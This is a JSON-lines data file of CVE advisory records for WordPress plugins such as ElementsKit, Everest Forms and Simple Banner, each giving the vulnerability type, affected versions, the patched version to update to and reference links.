{"CVE_ID":"CVE-2024-8544","slug":"facebook-conversion-pixel","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The Pixel Cat \u2013 Conversion Pixel Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4f4a78-7224-4f58-a103-7ad4df0eb36e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4f4a78-7224-4f58-a103-7ad4df0eb36e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151635%40facebook-conversion-pixel&new=3151635%40facebook-conversion-pixel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151635%40facebook-conversion-pixel&new=3151635%40facebook-conversion-pixel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-conversion-pixel\\\/trunk\\\/includes\\\/notices\\\/notices.php?rev=2918763#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-conversion-pixel\\\/trunk\\\/includes\\\/notices\\\/notices.php?rev=2918763#L81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5222","slug":"responsive-add-ons","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The Responsive Addons \u2013 Starter Templates, Advanced Features and Customizer Settings for Responsive Theme. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploader in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1af37ed-fcc6-479c-8c53-25ccb9a8659f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1af37ed-fcc6-479c-8c53-25ccb9a8659f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/class-responsive-add-ons.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/class-responsive-add-ons.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094256\\\/responsive-add-ons\\\/trunk\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094256\\\/responsive-add-ons\\\/trunk\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2042","slug":"elementskit-lite","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.4\\\/widgets\\\/image-accordion\\\/image-accordion.php#L962\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.4\\\/widgets\\\/image-accordion\\\/image-accordion.php#L962\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3992","slug":"ultimate-post","versionEndExcluding":"3.0.6","description":"The PostX WordPress plugin before 3.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c43b669f-0377-4402-833c-817b75001888\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c43b669f-0377-4402-833c-817b75001888\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4186","slug":"edwiser-bridge","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.0.5. This is due to the 'eb_user_email_verification_key' default value is empty, and the not empty check is missing in the 'eb_user_email_verify' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This can only be exploited if the 'Email Verification' setting is enabled.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6969d281-f280-4714-9859-38ac66e9cc60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6969d281-f280-4714-9859-38ac66e9cc60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/edwiser-bridge\\\/tags\\\/3.0.4\\\/includes\\\/class-eb-user-manager.php#L1571\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/edwiser-bridge\\\/tags\\\/3.0.4\\\/includes\\\/class-eb-user-manager.php#L1571\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081961\\\/edwiser-bridge#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081961\\\/edwiser-bridge#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13898","slug":"simple-banner","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Simple Banner \u2013 Easily add multiple Banners\/Bars\/Notifications\/Announcements to the top or bottom of your website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3264130%40simple-banner%2Ftrunk&old=3210193%40simple-banner%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3264130%40simple-banner%2Ftrunk&old=3210193%40simple-banner%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a2dea28-14cf-4e83-ac72-efc7c97ecf54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a2dea28-14cf-4e83-ac72-efc7c97ecf54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5470","slug":"etsy-shop","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Etsy Shop plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'etsy-shop' shortcode in versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4696f7a-8b87-4376-b4c9-596eca30b38c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4696f7a-8b87-4376-b4c9-596eca30b38c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977260\\\/etsy-shop#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977260\\\/etsy-shop#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L94\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L417\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1239","slug":"elementskit-lite","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blog post read more button in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3650","slug":"bubble-menu","versionEndExcluding":"3.0.5","description":"The Bubble Menu WordPress plugin before 3.0.5 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0ecdff-c961-4947-bf7e-bd2392501e33\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0ecdff-c961-4947-bf7e-bd2392501e33\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12739","slug":"mobile-contact-bar","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Mobile Contact Bar WordPress plugin before 3.0.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5492f1b2-481b-472a-82d3-949f85c8dc70\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5492f1b2-481b-472a-82d3-949f85c8dc70\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9828","slug":"taskbuilder","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Taskbuilder  WordPress plugin before 3.0.5 does not sanitize user input into the 'load_orders' parameter and uses it in a SQL statement, allowing high privilege users such as admin to perform SQL Injection attacks","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb2d0932-fd47-4aef-9d08-4377c742bb6e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb2d0932-fd47-4aef-9d08-4377c742bb6e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5228","slug":"user-registration","versionImpact":"3.0.4.1","versionEndExcluding":"3.0.4.2","description":"The User Registration WordPress plugin before 3.0.4.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50ae7008-46f0-4f89-ae98-65dcabe4ef09\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50ae7008-46f0-4f89-ae98-65dcabe4ef09\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10471","slug":"everest-forms","versionImpact":"3.0.4.1","versionEndExcluding":"3.0.4.2","description":"The Everest Forms  WordPress plugin before 3.0.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d590c9-c96d-40c9-aa59-48302ba3d63c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d590c9-c96d-40c9-aa59-48302ba3d63c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22676","slug":"upcasted-s3-offload","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in upcasted AWS S3 for WordPress Plugin \u2013 Upcasted allows Stored XSS. This issue affects AWS S3 for WordPress Plugin \u2013 Upcasted: from n\/a through 3.0.3.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upcasted-s3-offload\\\/vulnerability\\\/wordpress-upcasted-s3-offload-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upcasted-s3-offload\\\/vulnerability\\\/wordpress-upcasted-s3-offload-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4502","slug":"gtranslate","versionEndExcluding":"3.0.4","description":"The Translate WordPress with GTranslate WordPress plugin before 3.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). This vulnerability affects multiple parameters.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4804850-2ac2-4cec-bc27-07ed191d96da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4804850-2ac2-4cec-bc27-07ed191d96da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12527","slug":"perfect-portal-widgets","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The Perfect Portal Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'perfect_portal_intake_form' shortcode in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/perfect-portal-widgets\\\/tags\\\/3.0.3\\\/perfect-portal-widgets.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/perfect-portal-widgets\\\/tags\\\/3.0.3\\\/perfect-portal-widgets.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bded6765-e994-46a4-8c88-c324a4fd6ee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bded6765-e994-46a4-8c88-c324a4fd6ee6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"bubble-menu","versionEndExcluding":"3.0.4","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6525","slug":"elementskit-lite","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the progress bar element attributes in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This primarily affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e724394d-97aa-42e4-b36e-6e49bfefa2f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e724394d-97aa-42e4-b36e-6e49bfefa2f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/progressbar\\\/progressbar.php#L535\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/progressbar\\\/progressbar.php#L535\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/widgets\\\/progressbar\\\/progressbar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/widgets\\\/progressbar\\\/progressbar.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12769","slug":"simple-banner","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The Simple Banner  WordPress plugin before 3.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02b5c1a8-cf2a-4378-bfda-84d841d88a18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02b5c1a8-cf2a-4378-bfda-84d841d88a18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36849","slug":"ait-csv-import-export","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The AIT CSV import\/export plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the \/wp-content\/plugins\/ait-csv-import-export\/admin\/upload-handler.php file in versions up to, and including, 3.0.3. This makes it possible for unauthorized attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"name\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_ait_csv_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36e699a4-91f2-426d-ba14-26036fbfeaea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36e699a4-91f2-426d-ba14-26036fbfeaea\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-ait-themes-csv-import-export-arbitrary-file-upload-3-0-3\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-ait-themes-csv-import-export-arbitrary-file-upload-3-0-3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.ait-themes.club\\\/wordpress-plugins\\\/csv-import-export\\\/\",\"name\":\"https:\\\/\\\/www.ait-themes.club\\\/wordpress-plugins\\\/csv-import-export\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cece751c-400d-42b4-9438-950d5aca51fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cece751c-400d-42b4-9438-950d5aca51fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6582","slug":"elementskit-lite","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.3 via the ekit_widgetarea_content function. This makes it possible for unauthenticated attackers to obtain contents of posts in draft, private or pending review status that should not be visible to the general public. This applies to posts created with Elementor only.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff4ae5c8-d164-4c2f-9bf3-83934c22cf4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff4ae5c8-d164-4c2f-9bf3-83934c22cf4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/modules\\\/controls\\\/widget-area-utils.php#L15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/init\\\/enqueue-scripts.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/init\\\/enqueue-scripts.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/modules\\\/controls\\\/widget-area-utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/modules\\\/controls\\\/widget-area-utils.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8542","slug":"everest-forms","versionImpact":"3.0.3","versionEndExcluding":"3.0.3.1","description":"The Everest Forms  WordPress plugin before 3.0.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5f94dcf-a6dc-4c4c-acb6-1a7ead701053\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5f94dcf-a6dc-4c4c-acb6-1a7ead701053\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3868","slug":"folders","versionImpact":"3.0.2","versionEndExcluding":"3.0.3","description":"The Folders Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's First Name and Last Name in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daa48b64-6f89-40be-a31f-31d1481dfc91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/daa48b64-6f89-40be-a31f-31d1481dfc91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/premio.io\\\/downloads\\\/folders\\\/\",\"name\":\"https:\\\/\\\/premio.io\\\/downloads\\\/folders\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4717","slug":"strong-testimonials","versionEndExcluding":"3.0.3","description":"The Strong Testimonials WordPress plugin before 3.0.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b679f5-44a8-46d4-89dd-94eb647cb672\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14b679f5-44a8-46d4-89dd-94eb647cb672\",\"refsource\":\"MISC\",\"tags\":[]}]"}
